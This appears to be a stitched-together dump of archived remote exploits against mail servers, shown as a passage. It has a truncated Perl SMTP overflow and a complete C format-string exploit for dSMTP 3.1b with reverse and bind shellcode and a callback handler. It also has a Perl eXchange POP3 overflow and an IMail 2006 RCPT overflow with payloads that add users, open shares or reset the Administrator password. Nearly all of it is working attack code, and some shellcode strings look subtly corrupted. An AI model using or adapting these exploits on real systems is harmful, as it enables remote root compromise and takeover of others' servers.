close $socket;
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "EHLO\r\n";
send $socket, $request, 0;
print "[+] Sent EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = $cmd . "A"x1000 . "\r\n";
send $socket, $request, 0;
print "[+] Sent 3rd chunk\n";
close $socket;
# [2005-04-19]
25 dSMTP Mail Server 3.1b Linux Remote Root Format String Exploit
/*
* dSMTP - SMTP Mail Server 3.1b Linux Remote Root Format String Exploit
*
* cybertronic[at]gmx[dot]net
*
* 05/05/2005
*
* This exploits the "xtellmail" command!
*
* bindc0de breaks somehow, cb works fine!
* remote buffer space is about 256 bytes
* bad chars: 0x00, 0x20, 0x0a and prolly more
*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* NOTE: before you start, change the password in function exploit () *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
*
* [ cybertronic @ dsmtp ] # ./dmail_expl -h 192.168.2.50 -p 25 -l 192.168.2.40 -t 0
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ connecting to 192.168.2.50:25...done!
*
* --[ 220 linux.local DSMTP ESMTP Mail Server
*
* --[ select shellcode
* |
* |- [0] bind
* `- [1] cb
* >> 1
* --[ using cb shellcode
* --[ GOT: 0x08116844
* --[ RET: 0xbffe51f8
* --[ sending packet [ 252 bytes ]...done!
* --[ starting reverse handler [port: 45295]...done!
* --[ incomming connection from: 192.168.2.50
* --[ b0x pwned - h4ve phun
* Linux linux 2.4.21-99-athlon #1 Wed Sep 24 13:34:32 UTC 2003 i686 athlon i386 GNU/Linux
* uid=0(root) gid=0(root) groups=0(root)
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define NOP 0x90
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit ( int s, unsigned long smashaddr, unsigned long writeaddr, char* cbip );
int shell ( int s, char* tip );
int usage ( char* name );
void start_reverse_handler ( unsigned short cbport );
void connect_to_bindshell ( char* tip, unsigned short bport );
void header ();
void wait ( int sec );
/***********************
* Linux x86 Shellcode *
***********************/
//131 bytes connect back shellcode, port: 45295
char reverseshell[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0"
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";
//129 bytes bind shellcode, port 3879
char bindshell[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0"
"\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc"
"\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66"
"\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45"
"\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89"
"\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0"
"\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45"
"\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff"
"\xff\xff/bin/sh";
typedef struct _args {
char* tip;
char* lip;
int tport;
int target;
} args;
struct targets {
int num;
unsigned long smashaddr;
unsigned long writeaddr;
char name[64];
}
target[]= {
{ 0, 0x08116844, 0xbffe51f8, "SuSE Linux 9.0 (i586) - 2.4.21-99-athlon" }, //08116844 R_386_JUMP_SLOT strchr
{ 1, 0x08116844, 0xdeadc0de, "description" }
};
int
connect_to_remote_host ( char* tip, unsigned short tport )
{
int s;
char in[1024];
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
printf ( "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", tip, tport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
bzero ( &in, sizeof ( in ) );
if ( read ( s, in, sizeof ( in ) ) <= 0 )
{
printf ( "read failed!\n" );
return ( 1 );
}
printf ( "\n--[ %s\n", in );
return ( s );
}
int
exploit ( int s, unsigned long smashaddr, unsigned long writeaddr, char* cbip )
{
char buffer[512];
char a, b, c, d;
unsigned int low, high, cyber, tronic;
unsigned long ulcbip;
/***** change the password! *****/
char* pass = "522295153136689045";
/********************************/
printf ( "--[ GOT: 0x%08x\n", smashaddr );
printf ( "--[ RET: 0x%08x\n", writeaddr );
a = ( smashaddr & 0xff000000 ) >> 24;
b = ( smashaddr & 0x00ff0000 ) >> 16;
c = ( smashaddr & 0x0000ff00 ) >> 8;
d = ( smashaddr & 0x000000ff );
high = ( writeaddr & 0xffff0000 ) >> 16;
low = ( writeaddr & 0x0000ffff );
bzero ( &buffer, sizeof ( buffer ) );
if ( high < low )
{
printf ( "1\n" );
sprintf ( buffer,
"xtellmail %s X"
"%c%c%c%c"
"%c%c%c%c"
"%%.%uu%%1295$hn"
"%%.%uu%%1296$hn",
pass,
d + 2, c, b, a,
d, c, b, a,
high - 40,
low - high );
}
else
{
sprintf ( buffer,
"xtellmail %s X"
"%c%c%c%c"
"%c%c%c%c"
"%%.%uu%%1296$hn"
"%%.%uu%%1295$hn",
pass,
d + 2, c, b, a,
d, c, b, a,
low - 40,
high - low );
}
memset ( buffer + strlen ( buffer ), NOP, 180 );
if ( cbip == NULL )
memcpy ( buffer + 110, bindshell, sizeof ( bindshell ) -1 );
else
{
ulcbip = inet_addr ( cbip );
memcpy ( &reverseshell[33], &ulcbip, 4 );
memcpy ( buffer + 110, reverseshell, sizeof ( reverseshell ) -1 );
}
strncat ( buffer, "\r\n", 2 );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
{
printf ( "failed!\n" );
return ( 1 );
}
printf ( "done!\n" );
return ( 0 );
}
int
shell ( int s, char* tip )
{
int n;
char* cmd = "unset HISTFILE;uname -a;id;\n";
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
if ( write ( s, cmd, strlen ( cmd ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
int
usage ( char* name )
{
int i;
printf ( "\n" );
printf ( "Note: all switches have to be specified!\n" );
printf ( "You can choose between bind and cb shellcode later!\n" );
printf ( "\n" );
printf ( "Usage: %s -h <tip> -p <tport> -l <cbip> -t <target>\n", name );
printf ( "\n" );
printf ( "Targets\n\n" );
for ( i = 0; i < 2; i++ )
printf ( "\t[%d] [0x%08x] [0x%08x] [%s]\n", target[i].num, target[i].smashaddr, target[i].writeaddr, target[i].name );
printf ( "\n" );
exit ( 1 );
}
void
connect_to_bindshell ( char* tip, unsigned short bport )
{
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ("--[ sleeping %d seconds before connecting to %s:%u...\n", sec, tip, bport );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
}
printf ( YELLOW "done!\n" NORMAL);
shell ( s, tip );
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
parse_arguments ( int argc, char* argv[], args* argp )
{
int i = 0;
while ( ( i = getopt ( argc, argv, "h:p:l:t:" ) ) != -1 )
{
switch ( i )
{
case 'h':
argp->tip = optarg;
break;
case 'p':
argp->tport = atoi ( optarg );
break;
case 'l':
argp->lip = optarg;
break;
case 't':
argp->target = strtoul ( optarg, NULL, 16 );
break;
case ':':
case '?':
default:
usage ( argv[0] );
}
}
if ( argp->tip == NULL || argp->tport < 1 || argp->tport > 65535 || argp->lip == NULL || argp->target < 0 || argp->target > 1 )
usage ( argv[0] );
}
void
start_reverse_handler ( unsigned short cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ) );
close ( s2 );
}
void
wait ( int sec )
{
sleep ( sec );
}
int
main ( int argc, char* argv[] )
{
int s, option;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
s = connect_to_remote_host ( myargs.tip, myargs.tport );
printf ( "--[ select shellcode\n" );
printf ( " |\n" );
printf ( " |- [0] bind\n" );
printf ( " `- [1] cb\n" );
printf ( ">> " );
scanf ( "%d", &option );
switch ( option )
{
case 0:
printf ( "--[ sorry, does not work yet :/\n" );
/*
printf ( "--[ using bind shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
connect_to_bindshell ( myargs.tip, 3879 );
*/
break;
case 1:
printf ( "--[ using cb shellcode\n" );
if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 )
{
printf ( "exploitation failed!\n" );
exit ( 1 );
}
start_reverse_handler ( 45295 );
break;
default:
printf ( "--[ invalid shellcode!\n" ); exit ( 1 );
}
close ( s );
return 0;
}
// [2005-05-05]
25 eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit
#!/usr/bin/perl -w
# for educational purposes only .
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}
$buffer2 = "\x90"x1999999;
$mailf= "mail";
$rcptt ="rcpt to:<";
$buffer = "\x41"x4100;
$ret = "\x80\x1d\xdc\x02";
$shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x 83\xC0\x11\x33".
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x 03\x64\x03\x7C".
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\x CE\x74\x77\xFE".
"\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\x CE\x4E\xE0\xBB".
"\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x 01\xCE\x70\x77".
"\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x 01\xCE\x5A\x77".
"\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x 01\xCE\x46\x77".
"\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x 01\xCE\x42\x77".
"\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x 01\xCE\x7C\x77".
"\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x 01\xCE\x78\x77".
"\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x 01\xCE\x64\x77".
"\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x 01\xCE\x60\x77".
"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x 01\xCE\x6A\x77".
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x 01\xCE\x5E\xBB".
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x 88\x77\xDE\x7C".
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x 50\xDF\xDF\xE0".
"\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x 64\xDF\xDB\x77".
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x 01\xCE\x36\xE0".
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\x AC\xBB\x48\xBB".
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x 76\xCC\xAC\xB5".
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x 05\xCC\xAC\x98".
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x 4A\xD9\x77\xDE".
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x 77\xFE\x36\x77".
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x 88\x88\x03\xC8".
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\x DB\xDD\xDE\xDF".
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x 5D\x03\xC2\x90".
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x 7D\xBB\x77\x74".
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x 63\x7A\xB3\xF4".
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\x C3\x03\xD2\x94".
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x 5D\xD7\xD6\xD5".
"\xD3\x4A\x8C\x88";
$enter = "\x0d\x0a";
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect" }
print "\nExchangepop3 v5.0 remote exploit by securma massine\n";
print "\n+++++++++++www.morx.org++++++++++++++++\n";
$connect->recv($text,128);
print "$text\n";
$connect->send($mailf . $enter);
$connect->recv($text,128);
print "$text\n";
$connect->send($rcptt . $buffer . $ret . $buffer2 . $shellcode . $enter);
print "\nsending exploit......\n\n";
print "\ntelnet to server port 9191 .........\n\n";
# [2006-02-03]
25 Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit
// IMail 2006 and 8.x SMTP Stack Overflow Exploit
// coded by Greg Linares [glinares.code[at]gmail[dot]com
// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
// This works on the following versions:
// 2006 IMail prior to 2006.1 update
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"wsock32.lib")
int main(int argc, char *argv[])
{
static char overflow[1028];
// PAYLOADS
// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
/* win32_exec - EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
unsigned char RootShare[] =
"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x 74\x24\xf4\x58"
"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\x eb\x6e\x21\x46"
"\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x 60\xee\xa7\x69"
"\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x 7c\xe6\x49\x89"
"\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\x b1\x49\xe7\x62"
"\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x 78\x0e\xf4\x34"
"\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x 99\xa7\x07\x3c"
"\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\x ff\x4c\x38\xa5"
"\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x 75\x89\xc0\xac"
"\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\x b3\x8d\x97\xdc"
"\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\x a8\x05\x4b\x26"
"\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
unsigned char Win32Bind[] =
"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x93"
"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x 7b\x82\x42\xc9"
"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\x eb\x7a\x52\xbd"
"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x 7d\x4a\x7d\xaf"
"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\x a8\x2f\x99\x1e"
"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\x cc\x67\xbc\xdd"
"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x 18\x38\x8d\xbd"
"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\x dd\x75\x51\x66"
"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\x cc\x2f\x42\xe6"
"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x 12\x96\xb5\x34"
"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x 45\x28\xee\x65"
"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\x f5\x28\x34\xd7"
"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\x c6\x84\x6d\x5e"
"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x 76\x32\x3b\x7f"
"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\x ea\xbd\xc4\x61"
"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x 1a\x9e\xd7\x66"
"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x 39\x85\xff\x1b"
"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x 6d\xc8\xab\xc9"
"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\x c2\x2a\xe8\x67"
"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x 6c\x4c\x42\xe6"
"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x 63\xf1\xb9\x69"
"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
/* win32_adduser - PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char AddUser[] =
"\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xb2"
"\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\x b2\xe6\x24\x2f"
"\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x 92\xe7\x44\x23"
"\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\x b5\x27\x65\x67"
"\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x 96\xe7\x44\x0c"
"\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x 59\x6f\xf3\x4e"
"\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x 39\xa6\xa3\xe1"
"\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\x b2\xe6\x24\x02"
"\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\x da\x16\x25\x6e"
"\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x 9c\x83\xd7\x0f"
"\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x 92\xa3\xdd\x18"
"\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\x f6\xc6\x89\x4c"
"\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\x dd\x93\xdf\x4a"
"\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\x c0\x95\x8f\x2f"
"\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a";
/* win32_exec - CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */
unsigned char ChangeAdmin[] =
"\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x74"
"\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x 74\xb8\xc4\xff"
"\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x 54\xb9\xa4\xf3"
"\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x 73\x79\x85\xb7"
"\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x 50\xb9\xa4\xdc"
"\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x 9f\x31\x13\x9e"
"\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\x ff\xf8\x43\x31"
"\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x 74\xb8\xc4\xd2"
"\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x 1c\x48\xc5\xbe"
"\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x 54\xcd\x3c\xdf"
"\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x 74\xb8\x4f\xba";
WSADATA wsaData;
struct hostent *hp;
struct sockaddr_in sockin;
char buf[300], *check;
int sockfd, bytes;
int plen, i, JMP;
char *hostname;
unsigned short port;
printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n");
printf("Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >\n");
if (argc <= 1)
{
printf("Usage: %s [hostname] [port] <Payload> <JMP>\n", argv[0]);
printf("Default port is 25 \r\n");
printf("==============================\n");
printf("Payload Options: 1 = Default\n");
printf("==============================\n");
printf("1 = Share C:\\ as 'Export' Share\n");
printf("2 = Add User 'Error' with Password 'Error'\n");
printf("3 = Win32 Bind CMD to Port 4444\n");
printf("4 = Change Administrator Password to 'p@ssw0rd'\n");
printf("==============================\n");
printf("JMP Options: 1 = Default\n");
printf("==============================\n");
printf("1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 0x10036f71 \n");
printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n");
printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n");
printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n");
printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n");
printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n");
printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n");
printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n");
exit(0);
}
hostname = argv[1];
if (argv[2]) port = atoi(argv[2]);
else port = atoi("25");
if (argv[4]) JMP = atoi(argv[4]);
else JMP = atoi("1");
if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
{
fprintf(stderr, "Error setting up with WinSock v1.1\n");
exit(-1);
}
hp = gethostbyname(hostname);
if (hp == NULL)
{
printf("ERROR: Uknown host %s\n", hostname);
printf("%s",hostname);
exit(-1);
}
sockin.sin_family = hp->h_addrtype;
sockin.sin_port = htons(port);
sockin.sin_addr = *((struct in_addr *)hp->h_addr);
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
{
printf("ERROR: Socket Error\n");
exit(-1);
}
if ((connect(sockfd, (struct sockaddr *) &sockin,
sizeof(sockin))) == SOCKET_ERROR)
{
printf("ERROR: Connect Error\n");
closesocket(sockfd);
WSACleanup();
exit(-1);
}
printf("Connected to [%s] on port [%d], sending overflow....\n",
hostname, port);
if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
{
printf("ERROR: Recv Error\n");
closesocket(sockfd);
WSACleanup();
exit(1);
